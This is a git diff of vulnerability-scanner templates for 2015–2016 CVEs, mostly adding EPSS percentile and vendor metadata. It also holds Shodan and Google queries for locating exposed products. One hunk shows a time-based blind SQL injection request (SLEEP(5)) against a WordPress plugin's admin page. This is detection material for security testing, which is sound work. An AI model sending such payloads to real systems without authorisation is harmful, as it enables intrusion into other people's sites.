+16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0016 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* + epss-percentile: 0.52033 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index dadc000d42..7cd96cac24 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.96881 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* + epss-percentile: 0.99575 metadata: max-request: 1 vendor: d-link diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 74a7eda1cf..db3fc64fdd 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.97564 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* + epss-percentile: 0.99996 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 38ba59a2fc..128bbac596 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00239 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.61218 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index e0915a593a..bc655c06fd 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 - epss-score: 0.97411 + epss-score: 0.9741 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* + epss-percentile: 0.99883 metadata: max-request: 1 shodan-query: http.html:"IBM WebSphere Portal" diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index adb50e8858..d0eb497ded 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00151 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* + epss-percentile: 0.50657 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 6ebbc77776..d14efbf129 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -16,6 +16,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.00233 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* + epss-percentile: 0.60673 metadata: max-request: 1 vendor: kentico diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index c09e5962d7..ac4caccc5b 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 - epss-score: 0.00127 + epss-score: 0.0013 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* + epss-percentile: 0.47144 metadata: max-request: 1 vendor: gameconnect diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index b85cb15a2f..a030973153 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-200 epss-score: 0.9647 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* + epss-percentile: 0.99388 metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 482af0b3c6..cf82566970 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-918 epss-score: 0.00511 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* + epss-percentile: 0.73635 metadata: max-request: 1 vendor: umbraco diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 41008b0b18..793ea8da08 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00088 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.36469 metadata: max-request: 2 verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 0c7fe40371..78d1d5130e 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -5,18 +5,26 @@ info: author: Harsh severity: critical description: | - The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. - remediation: Fixed in version 2.0.3 + The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. reference: - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9 - http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html + - https://wordpress.org/plugins/404-to-301/#developers + remediation: Fixed in version 2.0.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2015-9323 cwe-id: CWE-89 + epss-score: 0.00784 + cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.79207 metadata: verified: true max-request: 2 + framework: wordpress + vendor: duckdev + product: 404_to_301 tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated http: @@ -27,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | @timeout: 15s GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1 diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index ee33cc0eea..a5cf4727a8 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00111 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.43615 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-symposium" diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 08a5002865..586c0d752c 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -13,8 +13,9 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - epss-score: 0.23765 + epss-score: 0.25055 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* + epss-percentile: 0.9605 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/robotcpa" diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 79066d1546..dae11fb9ae 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2016-0957 epss-score: 0.06304 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* + epss-percentile: 0.927 metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 9c24a4852d..9de0fafabf 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/admin-font-editor" diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 44fbc48f3f..bd145b8e70 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 474d5fe824..2430d002e1 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/anti-plagiarism" diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 65dab23dea..fc1c42eecb 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/defa-online-image-protector" diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 461dee8a7a..94f64c28bd 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00093 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.38597 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 1b80c03b1a..b0c528563d 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 6c01ed11c2..9f7a79031e 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44589 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 2839c0fccf..4848d6b312 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00142 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49194 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 023b296800..2a90f0f2f0 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 7bf2dc6517..8be4bd8da8 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index ddf170e830..67dc5543d7 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/heat-trackr" diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index f8ed55f4d4..72055e9cd6 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index d63886fd31..48a4894702 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/indexisto" diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 5c9a04c0ac..4304fc656b 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44589 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft" diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index f9b9ddbb8c..e9813e3aa2 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index dcd7398dd7..68f595d84c 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00142 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49194 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/page-layout-builder" diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index fce3b936c2..fd00d420d1 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00103 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* + epss-percentile: 0.4117 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index cb2e360636..d4cc16a8f6 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00142 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49194 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index b7d716f5b8..525303ccda 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 4ec082eb05..f73450f9a7 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index e4cd2c79db..57281ffc9e 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45183 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 75c9aeb247..0e587c7a02 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00249 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.6202 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index b9cb2155fb..2fde9593fc 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40571 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 69fc49e624..b264220cc0 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00142 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49194 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index aa6e5de965..340692278a 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00103 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* + epss-percentile: 0.4117 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index af008b59ce..7b6c19823d 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-77 epss-score: 0.97464 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* + epss-percentile: 0.99934 metadata: max-request: 2 vendor: phpmailer_project diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index fbc793f0c0..c48c2608d1 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -10,19 +10,21 @@ info: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html + - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-10108 cwe-id: CWE-77 - epss-score: 0.01264 + epss-score: 0.84853 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* + epss-percentile: 0.98057 metadata: max-request: 1 shodan-query: http.favicon.hash:-1074357885 vendor: western_digital product: mycloud_nas - tags: cve,cve2016,rce,oast,wdcloud + tags: packetstorm,cve,cve2016,rce,oast,wdcloud http: - raw: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 7991fd0130..c667d31da8 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10134 cwe-id: CWE-89 - epss-score: 0.05366 + epss-score: 0.46819 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + epss-percentile: 0.96962 metadata: max-request: 1 vendor: zabbix diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 9e84ed73be..3fbfb5f721 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01346 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + epss-percentile: 0.84443 metadata: max-request: 1 shodan-query: title:"Opsview" diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 53baca7c05..ecb69919b3 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00179 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + epss-percentile: 0.5437 metadata: max-request: 1 vendor: opsview diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index cf3677efa5..808685577e 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01018 + epss-score: 0.01574 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.85677 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/ebook-download" diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index a6158f9135..f09e66426b 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.00841 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.79955 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index a32034beef..652f02935e 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.01204 + epss-score: 0.02303 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.88281 metadata: max-request: 2 google-query: inurl:"/wp-content/plugins/mail-masta" diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 23b197fd5b..6586f1cad2 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-20 epss-score: 0.01127 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* + epss-percentile: 0.82845 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wsecure" @@ -24,7 +25,6 @@ info: vendor: joomlaserviceprovider product: wsecure tags: cve,cve2016,wordpress,wp-plugin,rce - variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index d7fe96ed6b..742e74115d 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54186 metadata: max-request: 2 verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 8d6c6805b2..da7364a9a1 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00245 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.61781 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 6d40e10c27..953d3a48c7 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - epss-score: 0.97385 + epss-score: 0.97375 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99856 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 81a67bc3de..64376ca045 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.24589 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* + epss-percentile: 0.96019 metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 8a6410c511..591133ab7c 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-77 epss-score: 0.97524 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99979 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 96664a0b13..5963d56d19 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 epss-score: 0.83955 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* + epss-percentile: 0.98024 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index afa4cbfe17..3ecd1c1032 100644 --- 